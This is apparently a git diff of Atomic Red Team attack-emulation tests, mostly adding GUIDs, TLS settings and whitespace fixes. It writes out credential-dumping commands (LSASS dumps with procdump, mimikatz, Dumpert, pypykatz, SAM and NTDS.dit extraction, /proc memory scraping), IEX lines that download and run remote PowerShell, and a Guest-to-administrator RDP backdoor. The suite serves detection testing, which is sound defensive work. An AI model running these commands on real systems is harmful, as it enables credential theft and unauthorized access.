       auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
-      description: After execution the Default Guest account will be enabled (Active)
-        and added to Administrators and Remote Desktop Users Group, and desktop will
-        allow multiple RDP connections
+      description: |
+        After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
+        and desktop will allow multiple RDP connections.
       supported_platforms:
       - windows
       input_arguments:
@@ -66962,6 +67638,10 @@ initial-access:
           description: Specify the guest password
           type: String
           default: Password123!
+        remove_rdp_access_during_cleanup:
+          description: Set to 1 if you want the cleanup to remove RDP access to machine
+          type: Integer
+          default: 0
       executor:
         command: |-
           net user #{guest_user} /active:yes
@@ -66974,8 +67654,9 @@ initial-access:
           net user #{guest_user} /active:no >nul 2>&1
           net localgroup administrators #{guest_user} /delete >nul 2>&1
           net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
+          if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
         name: command_prompt
         elevation_required: true
   T1078.002:
@@ -67642,6 +68323,7 @@ initial-access:
       description: |
         The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com).
         The below will successfully download the macro-enabled Excel file to the current location.
+        File is downloaded to the %temp% folder.
       supported_platforms:
       - windows
       executor:
@@ -67650,13 +68332,13 @@ initial-access:
             return 'Please install Microsoft Excel before running this test.'
           }
           else{
-            $url = 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
+            $url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
             $fileName = 'PhishingAttachment.xlsm'
             New-Item -Type File -Force -Path $fileName | out-null
             $wc = New-Object System.Net.WebClient
             $wc.Encoding = [System.Text.Encoding]::UTF8
             [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-            ($wc.DownloadString("$url")) | Out-File $fileName
+            Invoke-WebRequest -Uri $url -OutFile $fileName
           }
         name: powershell
     - name: Word spawned a command shell and used an IP address in the command line
@@ -67695,7 +68377,8 @@ initial-access:
 '
       executor:
         command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"ping 8.8.8.8`"`n"
           Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
         cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md
index 26822e04..024dd2aa 100644
--- a/atomics/T1003.001/T1003.001.md
+++ b/atomics/T1003.001/T1003.001.md
@@ -65,10 +65,14 @@ If you see a message saying \"wce.exe is not recognized as an internal or extern
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where resulting data should be placed | Path | %temp%&#92;wce-output.txt|
 | wce_zip_hash | File hash of the Windows Credential Editor zip file | String | 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933|
@@ -94,11 +98,12 @@ del "#{output_file}" >nul 2>&1
 ##### Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{wce_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
 $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
 if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
   Expand-Archive $zippath $parentpath\wce -Force
@@ -124,10 +129,14 @@ If you see a message saying "procdump.exe is not recognized as an internal or ex
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
 | procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;procdump.exe|
@@ -151,10 +160,11 @@ del "#{output_file}" >nul 2> nul
 ##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
 Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
 New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
@@ -175,6 +185,10 @@ Upon successful execution, you should see the following file created $env:TEMP\l
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2536dee2-12fb-459a-8c37-971844fa73be
+
+
+
 
 
 
@@ -208,10 +222,14 @@ If you see a message saying \"The system cannot find the path specified.\", try
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 7ae7102c-a099-45c8-b985-4c7a2d05790d
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | dumpert_exe | Path of Dumpert executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;Outflank-Dumpert.exe|
 
@@ -234,10 +252,11 @@ del C:\windows\temp\dumpert.dmp >nul 2> nul
 ##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
 Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
 ```
@@ -255,6 +274,10 @@ Manager and administrative permissions.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** dea6c349-f1c6-44f3-87a1-1ed33a59a607
+
+
+
 
 
 #### Run it with these steps! 
@@ -285,10 +308,14 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and c
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 453acf13-1dbd-47d7-b28a-172ce9228023
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path of the Lsass dump | Path | %tmp%&#92;lsass.DMP|
 | mimikatz_exe | Path of the Mimikatz binary | string | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;mimikatz.exe|
@@ -308,10 +335,11 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and c
 ##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
 $request = [System.Net.WebRequest]::Create($url)
 $response = $request.GetResponse()
@@ -328,7 +356,7 @@ Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
 ##### Description: Lsass dump must exist at specified location (#{input_file})
 ##### Check Prereq Commands:
 ```powershell
-cmd /c "if not exist #{input_file} (exit /b 1)" 
+cmd /c "if not exist #{input_file} (exit /b 1)"
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -351,6 +379,10 @@ Successful execution of this test will display multiple useranames and passwords
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** c37bc535-5c62-4195-9cc3-0517673171d8
+
+
+
 
 
 
@@ -369,7 +401,7 @@ pypykatz live lsa
 ##### Check Prereq Commands:
 ```cmd
 py -3 --version >nul 2>&1
-exit /b %errorlevel% 
+exit /b %errorlevel%
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -379,7 +411,7 @@ echo "Python 3 must be installed manually"
 ##### Check Prereq Commands:
 ```cmd
 py -3 -m pip --version >nul 2>&1
-exit /b %errorlevel% 
+exit /b %errorlevel%
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -389,7 +421,7 @@ echo "PIP must be installed manually"
 ##### Check Prereq Commands:
 ```cmd
 pypykatz -h >nul 2>&1
-exit /b %errorlevel% 
+exit /b %errorlevel%
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -410,6 +442,10 @@ Upon successful execution, you should see the following file created $env:SYSTEM
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 6502c8f0-b775-4dbd-9193-1298f56b6781
+
+
+
 
 
 
@@ -417,6 +453,7 @@ Upon successful execution, you should see the following file created $env:SYSTEM
 
 
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
 ```
 
@@ -443,10 +480,14 @@ If you see a message saying "procdump.exe is not recognized as an internal or ex
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 7cede33f-0acd-44ef-9774-15511300b24b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
 | procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;procdump.exe|
@@ -470,7 +511,7 @@ del "#{output_file}" >nul 2> nul
 ##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -495,10 +536,14 @@ Or, if you try to run the test without the required administrative privleges you
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
 
@@ -525,10 +570,14 @@ This test uses the technique describe in this tweet
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;dotnet-lsass.dmp|
 | createdump_exe | Path of createdump.exe executable | Path | C:&#92;Program Files&#92;dotnet&#92;shared&#92;Microsoft.NETCore.App&#92;5.*.*&#92;createdump.exe|
@@ -556,7 +605,7 @@ del #{output_file}
 ##### Description: Computer must have createdump.exe from .Net 5
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1} 
+if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -579,10 +628,14 @@ Upon successful execution, you should see the following file created $env:TEMP\l
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 86fc3f40-237f-4701-b155-81c01c48d697
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | xordump_exe | Path to xordump | Path | C:&#92;Windows&#92;Temp&#92;xordump.exe|
 | output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass-xordump.t1003.001.dmp|
@@ -606,10 +659,11 @@ Remove-Item ${output_file} -ErrorAction Ignore
 ##### Description: Computer must have xordump.exe
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} 
+if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
 ```
 
diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index eb902b08..95a7a2f6 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -38,6 +38,7 @@ atomic_tests:
       if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
     get_prereq_command: |
       $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
       if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
         Expand-Archive $zippath $parentpath\wce -Force
@@ -78,6 +79,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
     get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
       Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
       New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
@@ -129,6 +131,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
     get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
       Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
   executor:
@@ -183,6 +186,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
     get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
       $request = [System.Net.WebRequest]::Create($url)
       $response = $request.GetResponse()
@@ -256,6 +260,7 @@ atomic_tests:
   - windows
   executor:
     command: |
+       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
        IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
     cleanup_command: |
       Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
@@ -382,6 +387,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
     get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
   executor:
     command: |
diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md
index 1516c1da..ad162a55 100644
--- a/atomics/T1003.002/T1003.002.md
+++ b/atomics/T1003.002/T1003.002.md
@@ -44,6 +44,10 @@ Upon successful execution of this test, you will find three files named, sam, sy
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5c2571d0-1572-416d-9676-812e64ca9f44
+
+
+
 
 
 
@@ -76,6 +80,10 @@ Parses registry hives to obtain stored credentials
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a96872b2-cbf3-46cf-8eb4-27e8c0e85263
+
+
+
 
 
 
@@ -94,7 +102,7 @@ pypykatz live registry
 ##### Check Prereq Commands:
 ```cmd
 py -3 --version >nul 2>&1
-exit /b %errorlevel% 
+exit /b %errorlevel%
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -104,7 +112,7 @@ echo "Python 3 must be installed manually"
 ##### Check Prereq Commands:
 ```cmd
 py -3 -m pip --version >nul 2>&1
-exit /b %errorlevel% 
+exit /b %errorlevel%
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -114,7 +122,7 @@ echo "PIP must be installed manually"
 ##### Check Prereq Commands:
 ```cmd
 pypykatz -h >nul 2>&1
-exit /b %errorlevel% 
+exit /b %errorlevel%
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -134,10 +142,14 @@ This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a90c2f4d-6726-444e-99d2-a00cd7c20480
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_path | Path to the file to copy | Path | %SystemRoot%/system32/config/SAM|
 | file_name | Name of the copied file | String | SAM|
@@ -169,6 +181,10 @@ Executes a hashdump by reading the hasshes from the registry.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 804f28fc-68fc-40da-b5a2-e9d0bce5c193
+
+
+
 
 
 
diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md
index 60657899..a82206f8 100644
--- a/atomics/T1003.003/T1003.003.md
+++ b/atomics/T1003.003/T1003.003.md
@@ -37,10 +37,14 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | drive_letter | Drive letter to source VSC (including colon) | String | C:|
 
@@ -59,7 +63,7 @@ vssadmin.exe create shadow /for=#{drive_letter}
 ##### Description: Target must be a Domain Controller
 ##### Check Prereq Commands:
 ```cmd
-reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT 
+reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -84,10 +88,14 @@ This test must be executed on a Windows Domain Controller.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** c6237146-9ea6-4711-85c9-c56d263a6b03
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | vsc_name | Name of Volume Shadow Copy | String | &#92;&#92;?&#92;GLOBALROOT&#92;Device&#92;HarddiskVolumeShadowCopy1|
 | extract_path | Path for extracted NTDS.dit | Path | C:&#92;Windows&#92;Temp|
@@ -115,7 +123,7 @@ del "#{extract_path}\SYSTEM_HIVE"     >nul 2> nul
 ##### Description: Target must be a Domain Controller
 ##### Check Prereq Commands:
 ```cmd
-reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT 
+reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -124,7 +132,7 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
 ##### Description: Volume shadow copy must exist
 ##### Check Prereq Commands:
 ```cmd
-if not exist #{vsc_name} (exit /b 1) 
+if not exist #{vsc_name} (exit /b 1)
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -133,7 +141,7 @@ echo Run "Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with
 ##### Description: Extract path must exist
 ##### Check Prereq Commands:
 ```cmd
-if not exist #{extract_path} (exit /b 1) 
+if not exist #{extract_path} (exit /b 1)
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -158,10 +166,14 @@ Upon successful completion, you will find a copy of the ntds.dit file in the C:\
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2364e33d-ceab-4641-8468-bfb1d7cc2723
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_folder | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;ntds_T1003|
 
@@ -185,7 +197,7 @@ rmdir /q /s #{output_folder} >nul 2>&1
 ##### Description: Target must be a Domain Controller
 ##### Check Prereq Commands:
 ```cmd
-reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT 
+reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -206,10 +218,14 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 224f7de0-8f0a-4a94-b5d8-989b036c86da
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | drive_letter | Drive letter to source VSC (including colon) | String | C:|
 
@@ -228,7 +244,7 @@ wmic shadowcopy call create Volume=#{drive_letter}
 ##### Description: Target must be a Domain Controller
 ##### Check Prereq Commands:
 ```cmd
-reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT 
+reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -249,10 +265,14 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 542bb97e-da53-436b-8e43-e0a7d31a6c24
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | drive_letter | Drive letter to source VSC (including colon) | String | C:|
 
@@ -280,10 +300,14 @@ The Active Directory database NTDS.dit may be dumped by creating a symlink to Vo
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 21748c28-2793-4284-9e07-d6d028b66702
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | drive_letter | Drive letter to source VSC (including colon) | String | C:|
 | symlink_path | symlink path | String | C:&#92;Temp&#92;vssstore|
diff --git a/atomics/T1003.004/T1003.004.md b/atomics/T1003.004/T1003.004.md
index 244802ff..15260a63 100644
--- a/atomics/T1003.004/T1003.004.md
+++ b/atomics/T1003.004/T1003.004.md
@@ -20,10 +20,14 @@ https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%2
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 55295ab0-a703-433b-9ca4-ae13807de12f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | psexec_exe | Path to PsExec executable | Path | PathToAtomicsFolder&#92;T1003.004&#92;bin&#92;PsExec.exe|
 
@@ -46,7 +50,7 @@ del %temp%\secrets >nul 2> nul
 ##### Description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{psexec_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1003.006/T1003.006.md b/atomics/T1003.006/T1003.006.md
index f86b639b..c9efc3ad 100644
--- a/atomics/T1003.006/T1003.006.md
+++ b/atomics/T1003.006/T1003.006.md
@@ -22,10 +22,14 @@ Privileges required: domain admin or domain controller account (by default), or
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 129efd28-8497-4c87-a1b0-73b9a870ca3e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | domain | Targeted domain | string | example.com|
 | user | Targeted user | string | krbtgt|
@@ -47,7 +51,7 @@ Privileges required: domain admin or domain controller account (by default), or
 ##### Check Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
-if (Test-Path $mimikatz_path) {exit 0} else {exit 1} 
+if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1003.007/T1003.007.md b/atomics/T1003.007/T1003.007.md
new file mode 100644
index 00000000..d2d5875d
--- /dev/null
+++ b/atomics/T1003.007/T1003.007.md
@@ -0,0 +1,142 @@
+# T1003.007 - Proc Filesystem
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/007)
+<blockquote>Adversaries may gather credentials from information stored in the Proc filesystem or <code>/proc</code>. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.
+
+This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Dump individual process memory with sh (Local)](#atomic-test-1---dump-individual-process-memory-with-sh-local)
+
+- [Atomic Test #2 - Dump individual process memory with Python (Local)](#atomic-test-2---dump-individual-process-memory-with-python-local)
+
+
+<br/>
+
+## Atomic Test #1 - Dump individual process memory with sh (Local)
+Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
+copy process memory to an external file so it can be searched or exfiltrated later.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 7e91138a-8e74-456d-a007-973d67a0bb80
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin|
+| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh|
+| pid_term | Unique string to use to identify target process | String | T1003.007|
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sh #{script_path}
+PID=$(pgrep -n -f "#{pid_term}")
+HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
+MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
+MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
+MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
+dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
+grep -i "PASS" "#{output_file}"
+```
+
+#### Cleanup Commands:
+```sh
+rm -f "#{output_file}"
+```
+
+
+
+#### Dependencies:  Run with `sh`!
